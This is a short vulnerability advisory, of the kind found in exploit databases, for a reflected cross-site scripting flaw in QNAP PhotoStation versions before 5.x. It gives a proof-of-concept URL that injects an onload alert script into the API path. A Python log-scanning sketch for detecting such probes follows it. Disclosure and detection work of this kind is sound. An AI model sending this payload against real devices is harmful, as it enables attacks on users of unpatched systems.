QNAP PhotoStation Cross Site Scripting

QNAP PhotoStation versions prior to 5.x suffer from a cross site scripting vulnerability.


MD5 | 05f5de9d0cbcfeb0b09d981b2c4c7cc6

# Exploit QNAP PhotoStation < 5.x Cross-Site Scripting 
# Date: 5/22/2018
# Exploit Author: SaeedReza Zamanian
# Software Link: https://www.qnap.com/en/app_center/con_show.php?op=showone&internalName=PhotoStation&version=5.7.0&down_1_name=TS-251&jump_win=1&qts=4.3.4&seq=120
# Vendor Home Page: https://www.qnap.com
# Tested On: Unix
# Contact: https://www.linkedin.com/in/penetrationtest/


1. Description

Parameter validation is not implemented correctly in this application, so attackers can carry out an XSS attack against this web app.



2. Proof of Concept

https://[Site]:4443/photo/api/inde%3Cbody%20onload=alert('XSSED');%3E.php
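
Detection sketch for the request shape shown above, where the markup sits percent-encoded in the URL path rather than in a query parameter. This is an added example, not part of the original advisory or QNAP code. It assumes combined-format web access logs and that PhotoStation is served under /photo/; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Markup that has no place in a file path: tag brackets or an inline event handler.
MARKUP_RE = re.compile(r"[<>]|\bon[a-z]+\s*=", re.IGNORECASE)
WATCHED_PREFIX = "/photo/"  # assumption: PhotoStation is served under /photo/


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%253C) is normalised too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_path(log_line):
    """Return the decoded path if it carries markup, otherwise None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    # Look at the path only: the advisory's request has no query string.
    raw_path = match.group("target").split("?", 1)[0]
    path = decode_fully(raw_path)
    if path.startswith(WATCHED_PREFIX) and MARKUP_RE.search(path):
        return path
    return None


def scan(lines):
    """Collect every decoded path that looks like a reflected-XSS probe."""
    return [hit for hit in map(suspicious_path, lines) if hit is not None]


# Constructed sample log lines (not taken from a real system).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/May/2018:10:00:01 +0000] "GET /photo/api/example.php?a=1 HTTP/1.1" 200 512',
    '192.0.2.44 - - [22/May/2018:10:00:07 +0000] "GET /photo/api/inde%3Cbody%20onload=alert(\'XSSED\');%3E.php HTTP/1.1" 404 310',
    '192.0.2.44 - - [22/May/2018:10:00:09 +0000] "GET /photo/api/inde%253Cbody%253E.php HTTP/1.1" 404 310',
    '192.0.2.10 - - [22/May/2018:10:00:12 +0000] "GET /photo/gallery/one.jpg HTTP/1.1" 200 90211',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("possible reflected XSS probe:", hit)
```

A hit only shows that markup was sent in the path; whether the response reflected it unescaped still has to be confirmed against the installed PhotoStation version.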
